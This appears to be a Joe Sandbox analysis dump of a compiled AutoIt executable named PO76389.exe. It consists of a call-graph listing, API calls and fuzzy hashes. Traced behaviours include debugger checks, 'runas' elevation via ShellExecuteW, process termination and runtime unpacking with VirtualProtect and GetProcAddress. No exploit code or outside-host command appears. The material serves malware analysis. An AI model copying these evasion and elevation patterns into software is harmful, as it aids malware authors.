136 API calls 105235->105236 105238 4b3def 105236->105238 105237 5239f9 105240 4fcc82 122 API calls 105237->105240 105238->105237 105239 4b3f9b 136 API calls 105238->105239 105241 4b3e02 105239->105241 105242 523a0e 105240->105242 105241->105237 105243 4b3e0a 105241->105243 105244 523a12 105242->105244 105245 523a2f 105242->105245 105247 523a1a 105243->105247 105248 
4b3e16 105243->105248 105249 4b3e39 84 API calls 105244->105249 105246 4d010a 48 API calls 105245->105246 105268 523a74 Mailbox 105246->105268 105295 4f757b 87 API calls _wprintf 105247->105295 105294 4bbdf0 163 API calls 8 library calls 105248->105294 105249->105247 105252 523a28 105252->105245 105253 4b3e2e 105253->104500 105254 523c24 105255 4d28ca _free 47 API calls 105254->105255 105256 523c2c 105255->105256 105257 4b3e39 84 API calls 105256->105257 105262 523c35 105257->105262 105261 4d28ca _free 47 API calls 105261->105262 105262->105261 105263 4b3e39 84 API calls 105262->105263 105299 4f32b0 86 API calls 4 library calls 105262->105299 105263->105262 105265 4bcaee 48 API calls 105265->105268 105268->105254 105268->105262 105268->105265 105279 4bb6d0 105268->105279 105288 4ba870 105268->105288 105296 4f30ac 48 API calls _memmove 105268->105296 105297 4f2fcd 60 API calls 2 library calls 105268->105297 105298 4fa525 48 API calls 105268->105298 105270 4b3bd9 __wsetenvp 105269->105270 105271 4d010a 48 API calls 105270->105271 105272 4b3bee _wcscpy 105271->105272 105272->105217 105274 4b1990 105273->105274 105278 4b19af _memmove 105273->105278 105276 4d010a 48 API calls 105274->105276 105275 4d010a 48 API calls 105277 4b19c6 105275->105277 105276->105278 105277->105233 105278->105275 105280 4bb789 105279->105280 105283 4bb6e3 _memmove 105279->105283 105282 4d010a 48 API calls 105280->105282 105281 4d010a 48 API calls 105284 4bb6ea 105281->105284 105282->105283 105283->105281 105285 4bb71b 105284->105285 105286 4d010a 48 API calls 105284->105286 105285->105268 105287 4bb74d 105286->105287 105287->105268 105289 4ba883 105288->105289 105291 4ba93d 105288->105291 105290 4d010a 48 API calls 105289->105290 105289->105291 105292 4ba8c1 105289->105292 105290->105292 105291->105268 105292->105291 105293 4d010a 48 API calls 105292->105293 105293->105292 105294->105253 105295->105252 105296->105268 105297->105268 105298->105268 105299->105262 105301 4ba848 105300->105301 
105302 4ba72c 105300->105302 105301->104506 105302->105301 105303 4d010a 48 API calls 105302->105303 105304 4ba753 105303->105304 105305 4d010a 48 API calls 105304->105305 105306 4ba7c5 105305->105306 105306->105301 105309 4ba870 48 API calls 105306->105309 105310 4bb6d0 48 API calls 105306->105310 105313 4bace0 91 API calls 2 library calls 105306->105313 105314 4fa3ee 48 API calls 105306->105314 105309->105306 105310->105306 105311->104509 105312->104511 105313->105306 105314->105306 105316 4b31a2 LoadImageW 105315->105316 105317 524ad8 EnumResourceNamesW 105315->105317 105318 4b3118 RegisterClassExW 105316->105318 105317->105318 105319 4b2f58 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 105318->105319 105320 4b2fe9 LoadIconW 105319->105320 105322 4b301e 105320->105322 105322->104526 105324 4be80f 105323->105324 105325 4be7fd 105323->105325 105414 4fd520 86 API calls 4 library calls 105324->105414 105413 4bdcd0 346 API calls 2 library calls 105325->105413 105328 4be806 105328->104587 105329 5298e8 105329->105329 105331 4bea20 105330->105331 105337 4bea89 105331->105337 105415 4bfa40 346 API calls 3 library calls 105331->105415 105333 5299bc 105419 4fd520 86 API calls 4 library calls 105333->105419 105334 529919 105334->105337 105416 4fd520 86 API calls 4 library calls 105334->105416 105335 4bfa40 346 API calls 105362 4becd7 Mailbox 105335->105362 105340 4bd3d2 48 API calls 105337->105340 105355 4beb18 105337->105355 105337->105362 105338 4bd3d2 48 API calls 105341 529997 105338->105341 105342 529963 105340->105342 105418 4d1b2a 52 API calls __cinit 105341->105418 105417 4d1b2a 52 API calls __cinit 105342->105417 105343 4fd520 86 API calls 105343->105362 105346 4bd380 55 API calls 105346->105362 105348 529d70 105429 50e2fb 346 API calls Mailbox 105348->105429 105349 529e49 105434 4fd520 86 API calls 4 library calls 105349->105434 105350 529dc2 105431 4fd520 86 API calls 4 library calls 105350->105431 105351 529ddf 105432 50c235 346 API calls Mailbox 
105351->105432 105355->105338 105355->105362 105358 4b342c 48 API calls 105358->105362 105360 529df7 105363 4bef0c Mailbox 105360->105363 105433 4fd520 86 API calls 4 library calls 105360->105433 105361 4c14a0 48 API calls 105361->105362 105362->105333 105362->105335 105362->105343 105362->105346 105362->105348 105362->105349 105362->105350 105362->105351 105362->105358 105362->105361 105362->105363 105364 4bf56f 105362->105364 105367 4bd805 48 API calls 105362->105367 105368 529a3c 105362->105368 105420 4fa3ee 48 API calls 105362->105420 105421 50ede9 346 API calls 105362->105421 105427 4ea599 InterlockedDecrement 105362->105427 105428 50f4df 346 API calls 105362->105428 105363->104587 105364->105363 105430 4fd520 86 API calls 4 library calls 105364->105430 105367->105362 105422 50d154 48 API calls 105368->105422 105370 529a48 105372 529a56 105370->105372 105373 529a9b 105370->105373 105423 4fa485 48 API calls 105372->105423 105376 529a91 Mailbox 105373->105376 105424 4fafce 48 API calls 105373->105424 105426 4bfa40 346 API calls 3 library calls 105376->105426 105378 529ad8 105425 4cdf08 48 API calls 105378->105425 105381 4c469f 105380->105381 105382 4c4537 105380->105382 105383 4bcaee 48 API calls 105381->105383 105384 527820 105382->105384 105385 4c4543 105382->105385 105392 4c45e4 Mailbox 105383->105392 105483 50e713 346 API calls Mailbox 105384->105483 105482 4c4040 346 API calls _memmove 105385->105482 105388 52782c 105389 4c4639 Mailbox 105388->105389 105484 4fd520 86 API calls 4 library calls 105388->105484 105389->104587 105391 4c4559 105391->105388 105391->105389 105391->105392 105393 4b3e39 84 API calls 105392->105393 105435 4cdd84 105392->105435 105438 510bfa 105392->105438 105441 5001e4 105392->105441 105393->105389 105397->104587 105398->104587 105399->104587 105400->104587 105401->104541 105402->104534 105403->104539 105404->104587 105405->104587 105406->104583 105407->104583 105408->104583 105409->104587 105410->104583 105411->104583 105412->104583 
105413->105328 105414->105329 105415->105334 105416->105337 105417->105355 105418->105362 105419->105363 105420->105362 105421->105362 105422->105370 105423->105376 105424->105378 105425->105376 105426->105363 105427->105362 105428->105362 105429->105364 105430->105363 105431->105363 105432->105360 105433->105363 105434->105363 105485 4cdd92 GetFileAttributesW 105435->105485 105490 50f79f 105438->105490 105440 510c0a 105440->105389 105442 500218 105441->105442 105443 50020d 105441->105443 105445 4b84a6 81 API calls 105442->105445 105640 4bcdb4 48 API calls 105443->105640 105446 500232 105445->105446 105447 500254 105446->105447 105448 50033c 105446->105448 105457 500366 105446->105457 105449 4b84a6 81 API calls 105447->105449 105450 4b3f9b 136 API calls 105448->105450 105455 500260 _wcscpy _wcschr 105449->105455 105451 50034d 105450->105451 105452 500362 105451->105452 105453 4b3f9b 136 API calls 105451->105453 105454 4b84a6 81 API calls 105452->105454 105452->105457 105453->105452 105456 50039b 105454->105456 105459 5002b2 _wcscat 105455->105459 105463 500284 _wcscat _wcscpy 105455->105463 105576 4d297d 105456->105576 105457->105389 105460 4b84a6 81 API calls 105459->105460 105462 5002d0 _wcscpy 105460->105462 105461 5003bf _wcscat _wcscpy 105470 4b84a6 81 API calls 105461->105470 105641 4f7c0c GetFileAttributesW 105462->105641 105465 4b84a6 81 API calls 105463->105465 105465->105459 105466 5002f0 __wsetenvp 105466->105457 105467 4b84a6 81 API calls 105466->105467 105468 50031c 105467->105468 105642 4f6b3f 77 API calls 4 library calls 105468->105642 105471 500456 105470->105471 105579 4f7334 105471->105579 105472 500330 105472->105457 105474 500476 105475 4cdd84 3 API calls 105474->105475 105476 500485 105475->105476 105477 4b84a6 81 API calls 105476->105477 105479 5004b6 105476->105479 105478 50049f 105477->105478 105585 4fc890 105478->105585 105481 4b3e39 84 API calls 105479->105481 105481->105457 105482->105391 105483->105388 105484->105389 105486 4cdd89 
105485->105486 105487 524a7d FindFirstFileW 105485->105487 105486->105389 105488 524a95 FindClose 105487->105488 105489 524a8e 105487->105489 105489->105488 105491 4b84a6 81 API calls 105490->105491 105492 50f7db 105491->105492 105516 50f81d Mailbox 105492->105516 105526 510458 105492->105526 105494 50fa7c 105495 50fbeb 105494->105495 105499 50fa86 105494->105499 105562 510579 89 API calls Mailbox 105495->105562 105498 50fbf8 105498->105499 105501 50fc04 105498->105501 105539 50f5fb 105499->105539 105500 4b84a6 81 API calls 105520 50f875 Mailbox 105500->105520 105501->105516 105506 50faba 105553 4cf92c 105506->105553 105509 50fad4 105559 4fd520 86 API calls 4 library calls 105509->105559 105510 50faee 105512 4b3320 48 API calls 105510->105512 105514 50fb05 105512->105514 105513 50fadf GetCurrentProcess TerminateProcess 105513->105510 105517 4c14a0 48 API calls 105514->105517 105525 50fb2f 105514->105525 105515 50fc56 105515->105516 105522 50fc6f FreeLibrary 105515->105522 105516->105440 105518 50fb1e 105517->105518 105560 510300 105 API calls _free 105518->105560 105520->105494 105520->105500 105520->105516 105557 5128d9 48 API calls _memmove 105520->105557 105558 50fc96 60 API calls 2 library calls 105520->105558 105521 4c14a0 48 API calls 105521->105525 105522->105516 105525->105515 105525->105521 105561 4bd89e 50 API calls Mailbox 105525->105561 105563 510300 105 API calls _free 105525->105563 105527 4bb8a7 48 API calls 105526->105527 105528 510473 CharLowerBuffW 105527->105528 105564 50267a 105528->105564 105532 4bd3d2 48 API calls 105533 5104ac 105532->105533 105571 4b7f40 48 API calls _memmove 105533->105571 105535 5104c3 105536 4ba2fb 48 API calls 105535->105536 105538 5104cf Mailbox 105536->105538 105537 51050b Mailbox 105537->105520 105538->105537 105572 50fc96 60 API calls 2 library calls 105538->105572 105540 50f616 105539->105540 105544 50f66b 105539->105544 105541 4d010a 48 API calls 105540->105541 105542 50f638 105541->105542 105543 4d010a 48 API 
calls 105542->105543 105542->105544 105543->105542 105545 510719 105544->105545 105546 510944 Mailbox 105545->105546 105549 51073c _strcat _wcscpy __wsetenvp 105545->105549 105546->105506 105547 4bcdb4 48 API calls 105547->105549 105548 4bd00b 58 API calls 105548->105549 105549->105546 105549->105547 105549->105548 105550 4d45ec 47 API calls __crtGetStringTypeA_stat 105549->105550 105551 4b84a6 81 API calls 105549->105551 105575 4f8932 50 API calls __wsetenvp 105549->105575 105550->105549 105551->105549 105555 4cf941 105553->105555 105554 4cf9d9 VirtualProtect 105556 4cf9a7 105554->105556 105555->105554 105555->105556 105556->105509 105556->105510 105557->105520 105558->105520 105559->105513 105560->105525 105561->105525 105562->105498 105563->105525 105565 5026a4 __wsetenvp 105564->105565 105566 5026e2 105565->105566 105568 5026d8 105565->105568 105569 502763 105565->105569 105566->105532 105566->105538 105568->105566 105573 4cdfd2 60 API calls 105568->105573 105569->105566 105574 4cdfd2 60 API calls 105569->105574 105571->105535 105572->105537 105573->105568 105574->105569 105575->105549 105643 4d29c7 105576->105643 105580 4f7341 _wcschr __ftell_nolock 105579->105580 105581 4d297d __wsplitpath 47 API calls 105580->105581 105584 4f7357 _wcscat _wcscpy 105580->105584 105582 4f7389 105581->105582 105583 4d297d __wsplitpath 47 API calls 105582->105583 105583->105584 105584->105474 105586 4fc89d __ftell_nolock 105585->105586 105587 4d010a 48 API calls 105586->105587 105588 4fc8fa 105587->105588 105589 4b4bce 48 API calls 105588->105589 105590 4fc904 105589->105590 105591 4fc6a0 GetSystemTimeAsFileTime 105590->105591 105592 4fc90f 105591->105592 105593 4b41a7 83 API calls 105592->105593 105594 4fc922 _wcscmp 105593->105594 105595 4fc946 105594->105595 105596 4fc9f3 105594->105596 105597 4fce59 94 API calls 105595->105597 105598 4fce59 94 API calls 105596->105598 105599 4fc94b 105597->105599 105600 4fc9bf _wcscat 105598->105600 105601 4d297d __wsplitpath 47 API calls 
105599->105601 105623 4fc9fc 105599->105623 105602 4b417d 64 API calls 105600->105602 105600->105623 105606 4fc974 _wcscat _wcscpy 105601->105606 105603 4fca18 105602->105603 105604 4b417d 64 API calls 105603->105604 105605 4fca28 105604->105605 105607 4b417d 64 API calls 105605->105607 105608 4d297d __wsplitpath 47 API calls 105606->105608 105609 4fca43 105607->105609 105608->105600 105610 4b417d 64 API calls 105609->105610 105611 4fca53 105610->105611 105612 4b417d 64 API calls 105611->105612 105613 4fca6e 105612->105613 105614 4b417d 64 API calls 105613->105614 105615 4fca7e 105614->105615 105616 4b417d 64 API calls 105615->105616 105617 4fca8e 105616->105617 105618 4b417d 64 API calls 105617->105618 105619 4fca9e 105618->105619 105669 4fd009 GetTempPathW GetTempFileNameW 105619->105669 105621 4fcaaa 105622 4d4129 117 API calls 105621->105622 105634 4fcabb 105622->105634 105623->105479 105624 4fcb75 105625 4d4274 __fcloseall 83 API calls 105624->105625 105626 4fcb80 105625->105626 105628 4fcb9a 105626->105628 105629 4fcb86 DeleteFileW 105626->105629 105627 4b417d 64 API calls 105627->105634 105630 4fcc2e CopyFileW 105628->105630 105635 4fcba4 105628->105635 105629->105623 105631 4fcc56 DeleteFileW 105630->105631 105632 4fcc44 DeleteFileW 105630->105632 105683 4fcfc8 CreateFileW 105631->105683 105632->105623 105634->105623 105634->105624 105634->105627 105670 4d373e 105634->105670 105686 4fc251 118 API calls __fcloseall 105635->105686 105638 4fcc19 105638->105631 105639 4fcc1d DeleteFileW 105638->105639 105639->105623 105640->105442 105641->105466 105642->105472 105644 4d29d6 105643->105644 105645 4d29e2 105643->105645 105644->105645 105655 4d2a55 105644->105655 105662 4da9fb 47 API calls __cftoe2_l 105644->105662 105667 4d889e 47 API calls __getptd_noexit 105645->105667 105647 4d2b9a 105651 4d29c2 105647->105651 105668 4d7aa0 8 API calls __cftoe2_l 105647->105668 105650 4d2b21 105650->105645 105650->105651 105653 4d2b31 105650->105653 105651->105461 105652 
4d2ae0 105652->105645 105654 4d2afc 105652->105654 105664 4da9fb 47 API calls __cftoe2_l 105652->105664 105666 4da9fb 47 API calls __cftoe2_l 105653->105666 105654->105645 105654->105651 105658 4d2b12 105654->105658 105655->105645 105661 4d2ac2 105655->105661 105663 4da9fb 47 API calls __cftoe2_l 105655->105663 105665 4da9fb 47 API calls __cftoe2_l 105658->105665 105661->105650 105661->105652 105662->105655 105663->105661 105664->105654 105665->105651 105666->105651 105667->105647 105668->105651 105669->105621 105671 4d374a _flsall 105670->105671 105672 4d377c 105671->105672 105673 4d3764 105671->105673 105675 4d3774 _flsall 105671->105675 105676 4d5a9f __lock_file 48 API calls 105672->105676 105699 4d889e 47 API calls __getptd_noexit 105673->105699 105675->105634 105677 4d3782 105676->105677 105687 4d35e7 105677->105687 105678 4d3769 105700 4d7aa0 8 API calls __cftoe2_l 105678->105700 105684 4fcfee SetFileTime CloseHandle 105683->105684 105685 4fd004 105683->105685 105684->105685 105685->105623 105686->105638 105689 4d35f6 105687->105689 105694 4d3614 105687->105694 105688 4d3604 105702 4d889e 47 API calls __getptd_noexit 105688->105702 105689->105688 105689->105694 105697 4d362c _memmove 105689->105697 105691 4d3609 105703 4d7aa0 8 API calls __cftoe2_l 105691->105703 105701 4d37b4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105694->105701 105695 4d3914 __flush 78 API calls 105695->105697 105696 4d35c3 __flswbuf 47 API calls 105696->105697 105697->105694 105697->105695 105697->105696 105698 4dbd14 __flswbuf 78 API calls 105697->105698 105704 4d9af3 78 API calls 4 library calls 105697->105704 105698->105697 105699->105678 105700->105675 105701->105675 105702->105691 105703->105694 105704->105697 105705 5eb090 105706 5eb0a0 105705->105706 105707 5eb1ba LoadLibraryA 105706->105707 105711 5eb1ff VirtualProtect VirtualProtect 105706->105711 105708 5eb1d1 105707->105708 105708->105706 105710 5eb1e3 GetProcAddress 105708->105710 105710->105708 105713 5eb1f9 
ExitProcess 105710->105713 105712 5eb264 105711->105712 105712->105712 105714 4fc450 105715 4fc45d 105714->105715 105716 4fc463 105714->105716 105717 4d28ca _free 47 API calls 105715->105717 105718 4fc474 105716->105718 105719 4d28ca _free 47 API calls 105716->105719 105717->105716 105720 4fc486 105718->105720 105721 4d28ca _free 47 API calls 105718->105721 105719->105718 105721->105720 105722 521eed 105727 4ce975 105722->105727 105724 521f01 105743 4d1b2a 52 API calls __cinit 105724->105743 105726 521f0b 105728 4d010a 48 API calls 105727->105728 105729 4cea27 GetModuleFileNameW 105728->105729 105730 4d297d __wsplitpath 47 API calls 105729->105730 105731 4cea5b _wcsncat 105730->105731 105744 4d2bff 105731->105744 105734 4d010a 48 API calls 105735 4cea94 _wcscpy 105734->105735 105736 4bd3d2 48 API calls 105735->105736 105737 4ceacf 105736->105737 105747 4ceb05 105737->105747 105739 4ceae0 Mailbox 105739->105724 105740 4ba4f6 48 API calls 105742 4ceada _wcscat __wsetenvp _wcsncpy 105740->105742 105741 4d010a 48 API calls 105741->105742 105742->105739 105742->105740 105742->105741 105743->105726 105761 4daab9 105744->105761 105773 4bc4cd 105747->105773 105749 4ceb14 RegOpenKeyExW 105750 524b17 RegQueryValueExW 105749->105750 105751 4ceb35 105749->105751 105752 524b30 105750->105752 105753 524b91 RegCloseKey 105750->105753 105751->105742 105754 4d010a 48 API calls 105752->105754 105755 524b49 105754->105755 105756 4b4bce 48 API calls 105755->105756 105757 524b53 RegQueryValueExW 105756->105757 105758 524b6f 105757->105758 105760 524b86 105757->105760 105759 4b7e53 48 API calls 105758->105759 105759->105760 105760->105753 105762 4daaca 105761->105762 105763 4dabc6 105761->105763 105762->105763 105766 4daad5 105762->105766 105771 4d889e 47 API calls __getptd_noexit 105763->105771 105765 4dabbb 105772 4d7aa0 8 API calls __cftoe2_l 105765->105772 105769 4cea8a 105766->105769 105770 4d889e 47 API calls __getptd_noexit 105766->105770 105769->105734 105770->105765 
105771->105765 105772->105769 105774 4bc4da 105773->105774 105775 4bc4e7 105773->105775 105774->105749 105776 4d010a 48 API calls 105775->105776 105776->105774

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                      • Part of subcall function 004B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                    • IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO76389.exe,00000104,?,00571120,C:\Users\user\Desktop\PO76389.exe,00571124,?,?), ref: 004B37EE
                                                      • Part of subcall function 004B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004B352A
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00562934,00000010), ref: 005221C5
                                                    • SetCurrentDirectoryW.KERNEL32(?,?), ref: 005221FD
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00522232
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0054DAA4), ref: 00522290
                                                    • ShellExecuteW.SHELL32(00000000), ref: 00522297
                                                      • Part of subcall function 004B30A5: GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                      • Part of subcall function 004B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(00000063), ref: 004B30D5
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(000000A4), ref: 004B30E7
                                                      • Part of subcall function 004B30A5: LoadIconW.USER32(000000A2), ref: 004B30F9
                                                      • Part of subcall function 004B30A5: RegisterClassExW.USER32(?), ref: 004B3167
                                                      • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004B2ECB
                                                      • Part of subcall function 004B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B2EEC
                                                      • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F00
                                                      • Part of subcall function 004B2E9D: ShowWindow.USER32(00000000), ref: 004B2F09
                                                      • Part of subcall function 004B3598: _memset.LIBCMT ref: 004B35BE
                                                      • Part of subcall function 004B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004B3667
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                    • String ID: C:\Users\user\Desktop\PO76389.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"W
                                                    • API String ID: 4253510256-3064423846
                                                    • Opcode ID: 0e3d49c8da579bd5669c296ce4e0ca64e7ba7ca038b7ed5fb4d1094fc0ac9a82
                                                    • Instruction ID: 883924b4ebd2404bbc56d33ff6c485ab78a2a58faf97bb5c1a184cd201498bb8
                                                    • Opcode Fuzzy Hash: 0e3d49c8da579bd5669c296ce4e0ca64e7ba7ca038b7ed5fb4d1094fc0ac9a82
                                                    • Instruction Fuzzy Hash: 8A512D74604144BBCB10BFA6BC46FED3FB4AB25705F00005BF64596191CA744A89FB7E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph rendering omitted; basic blocks 4dbdf6-4dc61f; API calls in graph: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError]
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                    • Instruction ID: 708574b9cb43b7ea98e4247dfcf171224f1f35f5604fe1408835e78ef4203872
                                                    • Opcode Fuzzy Hash: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                    • Instruction Fuzzy Hash: B8325B75A022298FDB248F19DDA06EAB7B5FB46310F0440DBE40AE7B81D7349E80DF56

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph rendering omitted; basic blocks 4b29c2-4b2ac5 and 5222aa-5223a9; API calls in graph: NtdllDefWindowProc_W, PostQuitMessage, SetTimer, RegisterClipboardFormatW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus]
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 004B2A33
                                                    • KillTimer.USER32(?,00000001), ref: 004B2A5D
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B2A80
                                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2A8B
                                                    • CreatePopupMenu.USER32 ref: 004B2A9F
                                                    • PostQuitMessage.USER32(00000000), ref: 004B2AAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 157504867-2362178303
                                                    • Opcode ID: 167dc519e3f37d13f8dff695cabac1e869c5aab0eaca877dea5b7cd7bb0c2470
                                                    • Instruction ID: 7fc9df72a45f0e624aa9d9168a8ec06a6b876e3cd71d400decc1718435494a3f
                                                    • Opcode Fuzzy Hash: 167dc519e3f37d13f8dff695cabac1e869c5aab0eaca877dea5b7cd7bb0c2470
                                                    • Instruction Fuzzy Hash: 90413130200545ABDB34AF6CBE09BFA3669F729340F00451BF515922E1DAAC5C95B77E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph rendering omitted; basic blocks 4ce47b-4ce5f6 and 52297f-522a29; API calls in graph: GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo, FreeLibrary]
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 004CE4A7
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • GetCurrentProcess.KERNEL32(00000000,0054DC28,?,?), ref: 004CE567
                                                    • GetNativeSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5BC
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5C7
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 004CE5DA
                                                    • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5E4
                                                    • GetSystemInfo.KERNEL32(?,0054DC28,?,?), ref: 004CE5F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                    • String ID:
                                                    • API String ID: 2717633055-0
                                                    • Opcode ID: a29061d02b635141b6404f8a65c602226cec0a6131356d353b315b696315c598
                                                    • Instruction ID: d77789f1447a35d79beb2211e69d2310d5f00f4eefd23fd8c65d3bffe5b1823f
                                                    • Opcode Fuzzy Hash: a29061d02b635141b6404f8a65c602226cec0a6131356d353b315b696315c598
                                                    • Instruction Fuzzy Hash: 0261F1B5809290EBCF15CFA998C06E97FB46F2A304F1845DED8449B347D728C949CB2A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph rendering omitted; basic blocks 4b31f2-4b322d and 5257d3-52582b; API calls in graph: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource]
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004B3202
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 004B3219
                                                    • LoadResource.KERNEL32(?,00000000), ref: 005257D7
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 005257EC
                                                    • LockResource.KERNEL32(?), ref: 005257FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
